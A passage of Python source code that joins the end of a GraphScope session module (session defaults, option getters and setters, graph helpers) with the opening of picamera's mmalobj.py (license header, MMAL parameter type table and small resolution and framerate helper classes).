    if self.eager() and not graph.loaded():
        raise InvalidArgumentError("The graph has already been unloaded")
    # Imported lazily to avoid pulling the learning stack in at module import.
    from graphscope.learning.graph import GraphDAGNode as LearningGraphDAGNode

    learning_graph = self._wrapper(
        LearningGraphDAGNode(self, graph, nodes, edges, gen_labels)
    )
    if self.eager():
        # Cache the instance and link it to the graph so the graph's
        # lifecycle can manage it.
        self._learning_instance_dict[graph.vineyard_id] = learning_graph
        graph._attach_learning_instance(learning_graph)
    return learning_graph
def nx(self):
    """Return a copy of the ``graphscope.nx`` module bound to this session.

    A fresh module object is executed from the spec so every session gets
    its own copy; ``Graph`` and ``DiGraph`` are replaced by clones carrying
    a ``_session`` attribute pointing at this session. The result is cached
    on the session, so repeated calls return the same module object.

    Raises:
        RuntimeError: If the session is in lazy mode.
    """
    if not self.eager():
        raise RuntimeError(
            "Networkx module need the session to be eager mode. "
            "Current session is lazy mode."
        )
    # Return the previously-built per-session module, if any.
    if self._nx:
        return self._nx
    import importlib.util

    # Execute a private copy of graphscope.nx so mutating its classes below
    # does not affect other sessions sharing the interpreter.
    spec = importlib.util.find_spec("graphscope.nx")
    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)
    # Clone Graph/DiGraph (same base, same class dict) so each clone can
    # carry a distinct ``_session`` without touching the originals.
    graph = type("Graph", (mod.Graph.__base__,), dict(mod.Graph.__dict__))
    digraph = type("DiGraph", (mod.DiGraph.__base__,), dict(mod.DiGraph.__dict__))
    setattr(graph, "_session", self)
    setattr(digraph, "_session", self)
    setattr(mod, "Graph", graph)
    setattr(mod, "DiGraph", digraph)
    self._nx = mod
    return self._nx
session = Session
def set_option(**kwargs):
    """Set the value of specified options.

    Find params detail in :class:`graphscope.Session`.

    Available options:
        - num_workers
        - log_level
        - show_log
        - vineyard_shared_mem
        - k8s_namespace
        - k8s_service_type
        - k8s_gs_image
        - k8s_etcd_image
        - k8s_image_pull_policy
        - k8s_image_pull_secrets
        - k8s_coordinator_cpu
        - k8s_coordinator_mem
        - k8s_vineyard_daemonset
        - k8s_vineyard_cpu
        - k8s_vineyard_mem
        - k8s_engine_cpu
        - k8s_engine_mem
        - k8s_mars_worker_cpu
        - k8s_mars_worker_mem
        - k8s_mars_scheduler_cpu
        - k8s_mars_scheduler_mem
        - with_mars
        - enable_gaia
        - k8s_volumes
        - k8s_waiting_for_delete
        - engine_params
        - initializing_interactive_engine
        - timeout_seconds

    Args:
        kwargs: dict
            kv pair of GraphScope config you want to set.

    Raises:
        ValueError: If no such option exists.

    Returns: None
    """
    # Validate every key before mutating anything, so an unknown option
    # leaves the configuration completely untouched.
    for key in kwargs:
        if not hasattr(gs_config, key):
            raise ValueError(f"No such option {key} exists.")
    for key, value in kwargs.items():
        setattr(gs_config, key, value)
    # Logging configuration may depend on the options just changed.
    GSLogger.update()
def get_option(key):
    """Get the value of specified option.

    Find params detail in :class:`graphscope.Session`.

    Available options:
        - num_workers
        - log_level
        - show_log
        - vineyard_shared_mem
        - k8s_namespace
        - k8s_service_type
        - k8s_gs_image
        - k8s_etcd_image
        - k8s_image_pull_policy
        - k8s_image_pull_secrets
        - k8s_coordinator_cpu
        - k8s_coordinator_mem
        - k8s_vineyard_daemonset
        - k8s_vineyard_cpu
        - k8s_vineyard_mem
        - k8s_engine_cpu
        - k8s_engine_mem
        - k8s_mars_worker_cpu
        - k8s_mars_worker_mem
        - k8s_mars_scheduler_cpu
        - k8s_mars_scheduler_mem
        - with_mars
        - enable_gaia
        - k8s_volumes
        - k8s_waiting_for_delete
        - engine_params
        - initializing_interactive_engine
        - timeout_seconds

    Args:
        key: str
            Key of GraphScope config you want to get.

    Raises:
        ValueError: If no such option exists.

    Returns: result: the value of the option
    """
    # Guard clause keeps the happy path flat; the f-string matches the error
    # style used by set_option.
    if not hasattr(gs_config, key):
        raise ValueError(f"No such option {key} exists.")
    return getattr(gs_config, key)
def default_session(session):
    """Python's :code:`with` handler for defining a default session.

    Registers *session* so that code inside the :code:`with` block which
    needs a default session is executed against it.

    Args:
        session: :class:`Session`
            The session to be installed as the default session.

    Returns:
        A context manager for the default session.
    """
    controller = _default_session_stack.get_controller(session)
    return controller
def get_default_session():
    """Returns the default session for the current context.

    Raises:
        RuntimeError: Default session does not exist.

    Returns:
        The default :class:`Session`.
    """
    stack = _default_session_stack
    return stack.get_default()
def get_session_by_id(handle):
    """Return the session registered under *handle*.

    Args:
        handle: The session handle (id) to look up.

    Raises:
        ValueError: If no session with the given handle exists.
    """
    # Single dict lookup (EAFP) instead of a membership test followed by a
    # second lookup via .get().
    try:
        return _session_dict[handle]
    except KeyError:
        raise ValueError("Session {} not exists.".format(handle)) from None
class _DefaultSessionStack(object):
    """A stack of objects for providing implicit defaults."""

    def __init__(self):
        super().__init__()
        # The top of the stack (stack[-1]) is the current default session.
        self.stack = []

    def get_default(self):
        # Lazily create a local session when no default has been installed.
        # NOTE(review): this relies on ``sess.as_default()`` pushing the new
        # session onto this stack -- confirm against Session.as_default.
        if not self.stack:
            logger.info("Creating default session ...")
            sess = session(cluster_type="hosts", num_workers=1)
            sess.as_default()
        return self.stack[-1]

    def reset(self):
        # Drop every registered session (does not close them).
        self.stack = []

    def is_cleared(self):
        # True when no default session is installed.
        return not self.stack

    @contextlib.contextmanager
    def get_controller(self, default):
        """A context manager for manipulating a default stack."""
        self.stack.append(default)
        try:
            yield default
        finally:
            # stack may be empty if reset() was called
            if self.stack:
                self.stack.remove(default)
_default_session_stack = _DefaultSessionStack() # pylint: disable=protected-access
def g(incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
    """Construct a GraphScope graph object on the default session.

    It will launch and set a session to default when there is no default
    session found. See params detail in
    :class:`graphscope.framework.graph.GraphDAGNode`.

    Returns:
        :class:`graphscope.framework.graph.GraphDAGNode`: Evaluated in eager mode.

    Examples:
        .. code:: python

            >>> import graphscope
            >>> g = graphscope.g()

            >>> import graphscope
            >>> sess = graphscope.session()
            >>> sess.as_default()
            >>> g = graphscope.g()  # creating graph on the session "sess"
    """
    sess = get_default_session()
    return sess.g(incoming_data, oid_type, directed, generate_eid)
def gremlin(graph, engine_params=None):
    """Create an interactive engine and get the handler to execute gremlin queries.

    See params detail in :meth:`graphscope.Session.gremlin`.

    Returns:
        :class:`graphscope.interactive.query.InteractiveQueryDAGNode`:
            InteractiveQuery to execute gremlin queries, evaluated in eager mode.

    Examples:
        .. code:: python

            >>> import graphscope
            >>> g = graphscope.g()
            >>> interactive_query = graphscope.gremlin()
    """
    # Unlike g(), this never creates a session implicitly.
    if _default_session_stack.is_cleared():
        raise RuntimeError("No default session found.")
    sess = get_default_session()
    return sess.gremlin(graph, engine_params)
def graphlearn(graph, nodes=None, edges=None, gen_labels=None):
    """Create a graph learning engine.

    See params detail in :meth:`graphscope.Session.graphlearn`.

    Returns:
        :class:`graphscope.learning.GraphDAGNode`:
            An instance of learning graph that could be fed to the learning
            engine, evaluated in eager mode.

    Example:
        .. code:: python

            >>> import graphscope
            >>> g = graphscope.g()
            >>> lg = graphscope.graphlearn(g)
    """
    # Unlike g(), this never creates a session implicitly.
    if _default_session_stack.is_cleared():
        # Fixed typo: message previously read "No de fault session found."
        raise RuntimeError("No default session found.")
    return get_default_session().graphlearn(graph, nodes, edges, gen_labels)
|
mmalobj.py | # vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python header conversion
# Copyright (c) 2013-2017 Dave Jones <dave@waveform.org.uk>
#
# Original headers
# Copyright (c) 2012, Broadcom Europe Ltd
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's: with unicode_literals in effect above,
# type('') is Py2's unicode (and Py3's str), so ``str`` means text either way.
str = type('')
import io
import ctypes as ct
import warnings
import weakref
from threading import Thread, Event
from collections import namedtuple
from fractions import Fraction
from itertools import cycle
from functools import reduce
from operator import mul
from . import bcm_host, mmal
from .streams import BufferIO
from .exc import (
mmal_check,
PiCameraValueError,
PiCameraRuntimeError,
PiCameraMMALError,
PiCameraPortDisabled,
PiCameraDeprecated,
)
# Old firmwares confuse the RGB24 and BGR24 encodings. This flag tracks whether
# the order needs fixing (it is set during MMALCamera.__init__); None means
# "not determined yet".
FIX_RGB_BGR_ORDER = None
# Mapping of parameters to the C-structure they expect / return. If a parameter
# does not appear in this mapping, it cannot be queried / set with the
# MMALControlPort.params attribute. Entries mapped to None have a firmware
# revision dependent structure that is filled in at runtime (see the inline
# notes on ANNOTATE and CAMERA_INFO below).
PARAM_TYPES = {
    mmal.MMAL_PARAMETER_ALGORITHM_CONTROL: mmal.MMAL_PARAMETER_ALGORITHM_CONTROL_T,
    mmal.MMAL_PARAMETER_ANNOTATE: None, # adjusted by MMALCamera.annotate_rev
    mmal.MMAL_PARAMETER_ANTISHAKE: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET: mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET_T,
    mmal.MMAL_PARAMETER_AWB_MODE: mmal.MMAL_PARAMETER_AWBMODE_T,
    mmal.MMAL_PARAMETER_BRIGHTNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
    mmal.MMAL_PARAMETER_BUFFER_FLAG_FILTER: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS: mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS_T,
    mmal.MMAL_PARAMETER_CAMERA_BURST_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE: mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE_T,
    mmal.MMAL_PARAMETER_CAMERA_CONFIG: mmal.MMAL_PARAMETER_CAMERA_CONFIG_T,
    mmal.MMAL_PARAMETER_CAMERA_CUSTOM_SENSOR_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_CAMERA_INFO: None, # adjusted by MMALCameraInfo.info_rev
    mmal.MMAL_PARAMETER_CAMERA_INTERFACE: mmal.MMAL_PARAMETER_CAMERA_INTERFACE_T,
    mmal.MMAL_PARAMETER_CAMERA_ISP_BLOCK_OVERRIDE: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_CAMERA_MIN_ISO: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_CAMERA_NUM: mmal.MMAL_PARAMETER_INT32_T,
    mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG: mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG_T,
    mmal.MMAL_PARAMETER_CAMERA_RX_TIMING: mmal.MMAL_PARAMETER_CAMERA_RX_TIMING_T,
    mmal.MMAL_PARAMETER_CAMERA_SETTINGS: mmal.MMAL_PARAMETER_CAMERA_SETTINGS_T,
    mmal.MMAL_PARAMETER_CAMERA_USE_CASE: mmal.MMAL_PARAMETER_CAMERA_USE_CASE_T,
    mmal.MMAL_PARAMETER_CAPTURE_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
    mmal.MMAL_PARAMETER_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_CAPTURE_MODE: mmal.MMAL_PARAMETER_CAPTUREMODE_T,
    mmal.MMAL_PARAMETER_CAPTURE_STATS_PASS: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_CAPTURE_STATUS: mmal.MMAL_PARAMETER_CAPTURE_STATUS_T,
    mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST: mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST_T,
    mmal.MMAL_PARAMETER_CLOCK_ACTIVE: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD_T,
    mmal.MMAL_PARAMETER_CLOCK_ENABLE_BUFFER_INFO: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_CLOCK_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T,
    mmal.MMAL_PARAMETER_CLOCK_LATENCY: mmal.MMAL_PARAMETER_CLOCK_LATENCY_T,
    mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD_T,
    mmal.MMAL_PARAMETER_CLOCK_SCALE: mmal.MMAL_PARAMETER_RATIONAL_T,
    mmal.MMAL_PARAMETER_CLOCK_TIME: mmal.MMAL_PARAMETER_INT64_T,
    mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD_T,
    mmal.MMAL_PARAMETER_COLOUR_EFFECT: mmal.MMAL_PARAMETER_COLOURFX_T,
    mmal.MMAL_PARAMETER_CONTRAST: mmal.MMAL_PARAMETER_RATIONAL_T,
    mmal.MMAL_PARAMETER_CORE_STATISTICS: mmal.MMAL_PARAMETER_CORE_STATISTICS_T,
    mmal.MMAL_PARAMETER_CUSTOM_AWB_GAINS: mmal.MMAL_PARAMETER_AWB_GAINS_T,
    mmal.MMAL_PARAMETER_DISPLAYREGION: mmal.MMAL_DISPLAYREGION_T,
    mmal.MMAL_PARAMETER_DPF_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_DYNAMIC_RANGE_COMPRESSION: mmal.MMAL_PARAMETER_DRC_T,
    mmal.MMAL_PARAMETER_ENABLE_RAW_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_EXIF_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_EXIF: mmal.MMAL_PARAMETER_EXIF_T,
    mmal.MMAL_PARAMETER_EXP_METERING_MODE: mmal.MMAL_PARAMETER_EXPOSUREMETERINGMODE_T,
    mmal.MMAL_PARAMETER_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
    mmal.MMAL_PARAMETER_EXPOSURE_MODE: mmal.MMAL_PARAMETER_EXPOSUREMODE_T,
    mmal.MMAL_PARAMETER_EXTRA_BUFFERS: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_FIELD_OF_VIEW: mmal.MMAL_PARAMETER_FIELD_OF_VIEW_T,
    mmal.MMAL_PARAMETER_FLASH: mmal.MMAL_PARAMETER_FLASH_T,
    mmal.MMAL_PARAMETER_FLASH_REQUIRED: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_FLASH_SELECT: mmal.MMAL_PARAMETER_FLASH_SELECT_T,
    mmal.MMAL_PARAMETER_FLICKER_AVOID: mmal.MMAL_PARAMETER_FLICKERAVOID_T,
    mmal.MMAL_PARAMETER_FOCUS: mmal.MMAL_PARAMETER_FOCUS_T,
    mmal.MMAL_PARAMETER_FOCUS_REGIONS: mmal.MMAL_PARAMETER_FOCUS_REGIONS_T,
    mmal.MMAL_PARAMETER_FOCUS_STATUS: mmal.MMAL_PARAMETER_FOCUS_STATUS_T,
    mmal.MMAL_PARAMETER_FPS_RANGE: mmal.MMAL_PARAMETER_FPS_RANGE_T,
    mmal.MMAL_PARAMETER_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
    mmal.MMAL_PARAMETER_IMAGE_EFFECT: mmal.MMAL_PARAMETER_IMAGEFX_T,
    mmal.MMAL_PARAMETER_IMAGE_EFFECT_PARAMETERS: mmal.MMAL_PARAMETER_IMAGEFX_PARAMETERS_T,
    mmal.MMAL_PARAMETER_INPUT_CROP: mmal.MMAL_PARAMETER_INPUT_CROP_T,
    mmal.MMAL_PARAMETER_INTRAPERIOD: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_ISO: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_JPEG_ATTACH_LOG: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_JPEG_Q_FACTOR: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_JPEG_RESTART_INTERVAL: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_LOCKSTEP_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_LOGGING: mmal.MMAL_PARAMETER_LOGGING_T,
    mmal.MMAL_PARAMETER_MB_ROWS_PER_SLICE: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_MEM_USAGE: mmal.MMAL_PARAMETER_MEM_USAGE_T,
    mmal.MMAL_PARAMETER_MINIMISE_FRAGMENTATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_MIRROR: mmal.MMAL_PARAMETER_UINT32_T, # actually mmal.MMAL_PARAMETER_MIRROR_T but this just contains a uint32
    mmal.MMAL_PARAMETER_NALUNITFORMAT: mmal.MMAL_PARAMETER_VIDEO_NALUNITFORMAT_T,
    mmal.MMAL_PARAMETER_NO_IMAGE_PADDING: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_POWERMON_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_PRIVACY_INDICATOR: mmal.MMAL_PARAMETER_PRIVACY_INDICATOR_T,
    mmal.MMAL_PARAMETER_PROFILE: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
    mmal.MMAL_PARAMETER_RATECONTROL: mmal.MMAL_PARAMETER_VIDEO_RATECONTROL_T,
    mmal.MMAL_PARAMETER_REDEYE: mmal.MMAL_PARAMETER_REDEYE_T,
    mmal.MMAL_PARAMETER_ROTATION: mmal.MMAL_PARAMETER_INT32_T,
    mmal.MMAL_PARAMETER_SATURATION: mmal.MMAL_PARAMETER_RATIONAL_T,
    mmal.MMAL_PARAMETER_SEEK: mmal.MMAL_PARAMETER_SEEK_T,
    mmal.MMAL_PARAMETER_SENSOR_INFORMATION: mmal.MMAL_PARAMETER_SENSOR_INFORMATION_T,
    mmal.MMAL_PARAMETER_SHARPNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
    mmal.MMAL_PARAMETER_SHUTTER_SPEED: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_STATISTICS: mmal.MMAL_PARAMETER_STATISTICS_T,
    mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE: mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE_T,
    mmal.MMAL_PARAMETER_STILLS_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS: mmal.MMAL_PARAMETER_ENCODING_T,
    mmal.MMAL_PARAMETER_SUPPORTED_PROFILES: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
    mmal.MMAL_PARAMETER_SW_SATURATION_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_SW_SHARPEN_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_SYSTEM_TIME: mmal.MMAL_PARAMETER_UINT64_T,
    mmal.MMAL_PARAMETER_THUMBNAIL_CONFIGURATION: mmal.MMAL_PARAMETER_THUMBNAIL_CONFIG_T,
    mmal.MMAL_PARAMETER_URI: mmal.MMAL_PARAMETER_URI_T,
    mmal.MMAL_PARAMETER_USE_STC: mmal.MMAL_PARAMETER_CAMERA_STC_MODE_T,
    mmal.MMAL_PARAMETER_VIDEO_ALIGN_HORIZ: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_VIDEO_ALIGN_VERT: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_VIDEO_BIT_RATE: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_VIDEO_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_VIDEO_DROPPABLE_PFRAMES: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE: mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE_T,
    mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE: mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE_T,
    mmal.MMAL_PARAMETER_VIDEO_ENCODE_FRAME_LIMIT_BITS: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_VIDEO_ENCODE_INITIAL_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_HEADER: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_VECTORS: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_VIDEO_ENCODE_MAX_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_VIDEO_ENCODE_MIN_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_VIDEO_ENCODE_PEAK_RATE: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_VIDEO_ENCODE_QP_P: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL: mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL_T,
    mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_SLICE_DQUANT: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_VIDEO_ENCODE_SEI_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_VIDEO_ENCODE_SPS_TIMING: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_VIDEO_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
    mmal.MMAL_PARAMETER_VIDEO_IMMUTABLE_INPUT: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE: mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE_T,
    mmal.MMAL_PARAMETER_VIDEO_INTERPOLATE_TIMESTAMPS: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH: mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH_T,
    mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION: mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION_T,
    mmal.MMAL_PARAMETER_VIDEO_MAX_NUM_CALLBACKS: mmal.MMAL_PARAMETER_UINT32_T,
    mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS: mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS_T,
    mmal.MMAL_PARAMETER_VIDEO_REQUEST_I_FRAME: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_VIDEO_STABILISATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_ZERO_COPY: mmal.MMAL_PARAMETER_BOOLEAN_T,
    mmal.MMAL_PARAMETER_ZERO_SHUTTER_LAG: mmal.MMAL_PARAMETER_ZEROSHUTTERLAG_T,
    mmal.MMAL_PARAMETER_ZOOM: mmal.MMAL_PARAMETER_SCALEFACTOR_T,
    mmal.MMAL_PARAMETER_DRAW_BOX_FACES_AND_FOCUS: mmal.MMAL_PARAMETER_BOOLEAN_T,
    }
class PiCameraFraction(Fraction):
    """
    A :class:`~fractions.Fraction` subclass which can also masquerade as a
    (numerator, denominator) tuple for backwards compatibility; tuple-style
    access emits a deprecation warning.
    """
    # Shared text of the deprecation warning raised by the tuple protocol.
    _TUPLE_DEPRECATION = (
        'Accessing framerate as a tuple is deprecated; this value is '
        'now a Fraction, so you can query the numerator and '
        'denominator properties directly, convert to an int or float, '
        'or perform arithmetic operations and comparisons directly')

    def __len__(self):
        warnings.warn(PiCameraDeprecated(self._TUPLE_DEPRECATION))
        return 2

    def __getitem__(self, index):
        warnings.warn(PiCameraDeprecated(self._TUPLE_DEPRECATION))
        # Only the exact indexes 0 and 1 are valid (no negative indexing).
        try:
            return {0: self.numerator, 1: self.denominator}[index]
        except KeyError:
            raise IndexError('invalid index %d' % index)

    def __contains__(self, value):
        return value in (self.numerator, self.denominator)
class PiResolution(namedtuple('PiResolution', ('width', 'height'))):
    """
    A :func:`~collections.namedtuple` derivative which represents a resolution
    with a :attr:`width` and :attr:`height`.

    .. attribute:: width

        The width of the resolution in pixels

    .. attribute:: height

        The height of the resolution in pixels

    .. versionadded:: 1.11
    """
    __slots__ = () # workaround python issue #24931

    def pad(self, width=32, height=16):
        """
        Returns the resolution padded up to the nearest multiple of *width*
        and *height* which default to 32 and 16 respectively (the camera's
        native block size for most operations). For example:

        .. code-block:: pycon

            >>> PiResolution(1920, 1080).pad()
            PiResolution(width=1920, height=1088)
            >>> PiResolution(100, 100).pad(16, 16)
            PiResolution(width=112, height=112)
        """
        # Fixed docstring: the doctest previously showed a duplicated example
        # whose first output (width=128) was wrong; 100 rounded up to a
        # multiple of 16 is 112.
        return PiResolution(
            width=((self.width + (width - 1)) // width) * width,
            height=((self.height + (height - 1)) // height) * height,
            )

    def transpose(self):
        """
        Returns the resolution with the width and height transposed. For
        example:

        .. code-block:: pycon

            >>> PiResolution(1920, 1080).transpose()
            PiResolution(width=1080, height=1920)
        """
        return PiResolution(self.height, self.width)

    def __str__(self):
        return '%dx%d' % (self.width, self.height)
class PiFramerateRange(namedtuple('PiFramerateRange', ('low', 'high'))):
    """
    A :func:`~collections.namedtuple` derivative storing the low and high
    limits of a range of framerates. Prefer attribute access over positional
    access (``camera.framerate_range.low`` rather than
    ``camera.framerate_range[0]``).

    .. attribute:: low

        The lowest framerate that the camera is permitted to use (inclusive).
        When the :attr:`~picamera.PiCamera.framerate_range` attribute is
        queried, this value will always be returned as a
        :class:`~fractions.Fraction`.

    .. attribute:: high

        The highest framerate that the camera is permitted to use (inclusive).
        When the :attr:`~picamera.PiCamera.framerate_range` attribute is
        queried, this value will always be returned as a
        :class:`~fractions.Fraction`.

    .. versionadded:: 1.13
    """
    __slots__ = () # workaround python issue #24931

    def __new__(cls, low, high):
        # Normalize both bounds to Fractions on construction.
        low = to_fraction(low)
        high = to_fraction(high)
        return super(PiFramerateRange, cls).__new__(cls, low, high)

    def __str__(self):
        return '{0}..{1}'.format(self.low, self.high)
class PiSensorMode(namedtuple('PiSensorMode', ('resolution', 'framerates',
'video', 'still', 'full_fov'))):
    """
    A :func:`~collections.namedtuple` derivative describing a camera sensor
    mode.

    .. attribute:: resolution

        A :class:`PiResolution` specifying the size of frames output by the
        camera in this mode.

    .. attribute:: framerates

        A :class:`PiFramerateRange` specifying the minimum and maximum
        framerates supported by this sensor mode. Typically the low value is
        exclusive and high value inclusive.

    .. attribute:: video

        A :class:`bool` indicating whether or not the mode is capable of
        recording video. Currently this is always ``True``.

    .. attribute:: still

        A :class:`bool` indicating whether the mode can be used for still
        captures (cases where a capture method is called with
        ``use_video_port`` set to ``False``).

    .. attribute:: full_fov

        A :class:`bool` indicating whether the full width of the sensor
        area is used to capture frames. This can be ``True`` even when the
        resolution is less than the camera's maximum resolution due to binning
        and skipping. See :ref:`camera_modes` for a diagram of the available
        fields of view.
    """
    __slots__ = () # workaround python issue #24931

    def __new__(cls, resolution, framerates, video=True, still=False,
                full_fov=True):
        # Coerce plain tuples/strings into the rich types on construction.
        if not isinstance(resolution, PiResolution):
            resolution = to_resolution(resolution)
        if not isinstance(framerates, PiFramerateRange):
            framerates = PiFramerateRange(*framerates)
